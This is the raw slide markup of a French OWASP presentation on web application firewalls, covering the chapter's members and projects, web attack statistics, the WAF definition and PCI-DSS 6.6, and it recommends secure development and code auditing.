              <a:t> et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Responsable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> des aspects </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>Juridiques</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> 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CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Estelle </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Aimé</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Avocate</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Webdings" pitchFamily="-65" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" u="sng" dirty="0"/>
              <a:t>Un Bureau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="744538" lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buClrTx/>
              <a:buFont typeface="Wingdings" pitchFamily="-65" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Conseil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>d’Administration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="744538" lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="-65" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Romain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gaucher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> : Ex-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>chercheur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> au NIST, consultant chez </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Cigital</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="744538" lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="-65" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mathieu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Estrade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>Développeur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Apache.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52400" y="4038601"/>
            <a:ext cx="2971800" cy="19082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en-US" sz="1400" b="1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Projets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1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: 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Top 10 :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traduit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.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Guides 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: en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cours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.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Questionnaire a destination des RSSI : en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cours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.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Groupe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de travail de la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sécurité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applicative du CLUSIF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629400" y="4038601"/>
            <a:ext cx="2438400" cy="17697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Interventions : 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Infosecurity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Tahoma" pitchFamily="-112" charset="0"/>
              <a:ea typeface="Tahoma" pitchFamily="-112" charset="0"/>
              <a:cs typeface="Tahoma" pitchFamily="-112" charset="0"/>
              <a:sym typeface="Tahoma" pitchFamily="-112" charset="0"/>
            </a:endParaRP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OSSIR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Microsoft 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TechDays</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Tahoma" pitchFamily="-112" charset="0"/>
              <a:ea typeface="Tahoma" pitchFamily="-112" charset="0"/>
              <a:cs typeface="Tahoma" pitchFamily="-112" charset="0"/>
              <a:sym typeface="Tahoma" pitchFamily="-112" charset="0"/>
            </a:endParaRP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PCI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Global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CERT-IST</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Tahoma" pitchFamily="-112" charset="0"/>
              <a:ea typeface="Tahoma" pitchFamily="-112" charset="0"/>
              <a:cs typeface="Tahoma" pitchFamily="-112" charset="0"/>
              <a:sym typeface="Tahoma" pitchFamily="-11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24200" y="4038601"/>
            <a:ext cx="3505200" cy="249299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  <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1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Sensibilisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1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/ Formations :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Assurance(s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) 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(Java/PHP)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Société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d’EDI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(JAVA)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Opérateur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Téléphonie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mobile (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PHP/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WebServices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)</a:t>
            </a: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Différents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services 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gouvernementaux</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Tahoma" pitchFamily="-112" charset="0"/>
              <a:ea typeface="Tahoma" pitchFamily="-112" charset="0"/>
              <a:cs typeface="Tahoma" pitchFamily="-112" charset="0"/>
              <a:sym typeface="Tahoma" pitchFamily="-112" charset="0"/>
            </a:endParaRP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Conférences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dans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty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des 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écoles</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Tahoma" pitchFamily="-112" charset="0"/>
              <a:ea typeface="Tahoma" pitchFamily="-112" charset="0"/>
              <a:cs typeface="Tahoma" pitchFamily="-112" charset="0"/>
              <a:sym typeface="Tahoma" pitchFamily="-112" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="575"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Webdings" pitchFamily="-112" charset="2"/>
              <a:buChar char="4"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Sociétés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 du CAC40 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1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Banque/Aéronautique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="-112" charset="0"/>
                <a:ea typeface="Tahoma" pitchFamily="-112" charset="0"/>
                <a:cs typeface="Tahoma" pitchFamily="-112" charset="0"/>
                <a:sym typeface="Tahoma" pitchFamily="-112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rgbClr val="E6E6E6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L’OWASP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Web Application Firewalls (WAF)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Choisir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Mythes et réalités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mode d’emploi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S’amuser avec son WAF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Et après ?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40"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Pas de recette Miracle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048000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rIns="132040"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Mettre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> en place un cycle de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>développement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sécurisé</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Auditer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et Tester son code !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Vérifier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fonctionnement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> de son Application 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4025900"/>
            <a:ext cx="67040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800" b="1" i="1" dirty="0"/>
              <a:t>La sécurité est d’abord et avant tout affaire de bon </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>sens.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52232" name="Flèche courbée vers la droite 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="3581400"/>
            <a:ext cx="1219200" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="curvedRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25000"/>
              <a:gd name="adj2" fmla="val 50000"/>
              <a:gd name="adj3" fmla="val 24998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  <p:bldP spid="522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85200" y="6308725"/>
            <a:ext cx="406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CF6417-D530-754C-83E0-7779A419F5E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762000"/>
            <a:ext cx="533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9688" indent="-39688" algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="4400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Tahoma" pitchFamily="-65" charset="0"/>
                <a:ea typeface="ヒラギノ角ゴ ProN W6" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ヒラギノ角ゴ ProN W6" pitchFamily="-65" charset="-128"/>
                <a:sym typeface="Tahoma" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>Rejoignez nous  !</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="4400" b="1" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="-65" charset="0"/>
              <a:ea typeface="ヒラギノ角ゴ ProN W6" pitchFamily="-65" charset="-128"/>
              <a:cs typeface="ヒラギノ角ゴ ProN W6" pitchFamily="-65" charset="-128"/>
              <a:sym typeface="Tahoma" pitchFamily="-65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0" y="1905000"/>
            <a:ext cx="441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9688" indent="-39688" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="-65" charset="0"/>
                <a:ea typeface="ヒラギノ角ゴ ProN W6" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ヒラギノ角ゴ ProN W6" pitchFamily="-65" charset="-128"/>
                <a:sym typeface="Tahoma" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="-65" charset="0"/>
                <a:ea typeface="ヒラギノ角ゴ ProN W6" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ヒラギノ角ゴ ProN W6" pitchFamily="-65" charset="-128"/>
                <a:sym typeface="Tahoma" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>www.owasp.fr</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Tahoma" pitchFamily="-65" charset="0"/>
              <a:ea typeface="ヒラギノ角ゴ ProN W6" pitchFamily="-65" charset="-128"/>
              <a:cs typeface="ヒラギノ角ゴ ProN W6" pitchFamily="-65" charset="-128"/>
              <a:sym typeface="Tahoma" pitchFamily="-65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581" b="453"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="914400"/>
            <a:ext cx="2825202" cy="363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L’OWASP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Web Application Firewalls (WAF)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Choisir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Mythes et réalités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WAF mode d’emploi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S’amuser avec son WAF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="E6E6E6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Et après ?</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0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11187" y="304800"/>
            <a:ext cx="8229600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bIns="5076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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="-65" charset="0"/>
                <a:ea typeface="ヒラギノ角ゴ ProN W6" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="ヒラギノ角ゴ ProN W6" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Faiblesse des Applications Web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1" y="1295400"/>
            <a:ext cx="4362451" cy="3275013"/>
            <a:chOff x="-53" y="624"/>
            <a:chExt cx="2748" cy="2063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21" y="839"/>
              <a:ext cx="453" cy="1311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buFont typeface="Times New Roman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>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" charset="0"/>
                </a:rPr>
                <a:t>75 %</a:t>
              </a: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2095" y="1108"/>
              <a:ext cx="453" cy="158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buFont typeface="Times New Roman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>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" charset="0"/>
                </a:rPr>
                <a:t>90 %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121" y="2150"/>
              <a:ext cx="453" cy="537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buFont typeface="Times New Roman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>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" charset="0"/>
                </a:rPr>
                <a:t>25 %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095" y="839"/>
              <a:ext cx="453" cy="269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buFont typeface="Times New Roman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>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" charset="0"/>
                </a:rPr>
                <a:t>10 %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562" y="839"/>
              <a:ext cx="1521" cy="1849"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill rotWithShape="0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 scaled="1"/>
            </a:gradFill>
            <a:ln w="9360">
              <a:solidFill>
                <a:srgbClr val="B6DCD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Times New Roman" charset="0"/>
                <a:buNone/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571" y="1108"/>
              <a:ext cx="1525" cy="104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buFont typeface="Times New Roman" charset="0"/>
                <a:buNone/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9953" name="Text Box 9"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="-53" y="624"/>
              <a:ext cx="933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>
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>% Attaques</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39954" name="Text Box 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1672" y="624"/>
              <a:ext cx="1024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2000">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>% Dépenses</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39940" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="306387" y="4648200"/>
            <a:ext cx="3810000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chemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Etude du GARTNER </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2003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chemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>75% des attaques ciblent le niveau Applicatif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chemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>66% des  applications web sont vulnérables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9941" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1081087" y="1828800"/>
            <a:ext cx="202088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</a:rPr>
              <a:t>Application Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39942" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1155700" y="3962400"/>
            <a:ext cx="23177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</a:rPr>
              <a:t>Eléments Réseaux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97387" y="1676400"/>
            <a:ext cx="4570413" cy="3490913"/>
            <a:chOff x="2784" y="864"/>
            <a:chExt cx="2879" cy="2199"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="39945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2" y="864"/>
              <a:ext cx="2452" cy="17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9946" name="Rectangle 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2784" y="2736"/>
              <a:ext cx="2880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>
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Etude du SANS (septembre 2009)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>
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>http://www.sans.org/top-cyber-security-risks/</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39944" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="687387" y="5599113"/>
            <a:ext cx="80772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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"La veille d’un incident, le retour sur investissement d’un système de sécurité est nul. Le lendemain, il est infini." Dennis Hoffman, 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632700" cy="5448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 Je suis protégé contre les attaques, j’ai un firewall </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0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1268413" y="1233488"/>
            <a:ext cx="6529387" cy="496252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Mon site Web est sécurisé puisque il est protégé par SSL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588250" cy="4273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arriva le WAF…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3200400"/>
            <a:ext cx="8153400" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.owasp.org/index.php/Web_Application_Firewall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>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38200" y="4110097"/>
            <a:ext cx="78486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sz="1600" dirty="0" smtClean="0"/>
              <a:t>A web application firewall (WAF) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t> an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>appliance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>, server plugin, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>filter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applies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t> a set of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>rules</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t> to an HTTP conversation. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Generally</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>these</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>rules</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>cover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common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attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>such</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Cross-site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t> Scripting (XSS) and SQL Injection. By </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>customizing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rules</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t> application, </a:t>
            </a:r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attacks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identified</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>blocked</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>. The effort to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>perform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>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customization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significant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>needs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maintained</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> as the application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modified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990600"/>
            <a:ext cx="673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2588" indent="-3429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Webdings" pitchFamily="-65" charset="2"/>
              <a:buChar char="&lt;"/>
            </a:pP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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>PCI-DSS (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  <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.pcisecuritystandards.org/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ahoma" pitchFamily="-65" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>)  6.6 :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466910"/>
            <a:ext cx="79248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 the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Requirement</a:t>
            </a:r>
            <a:r>
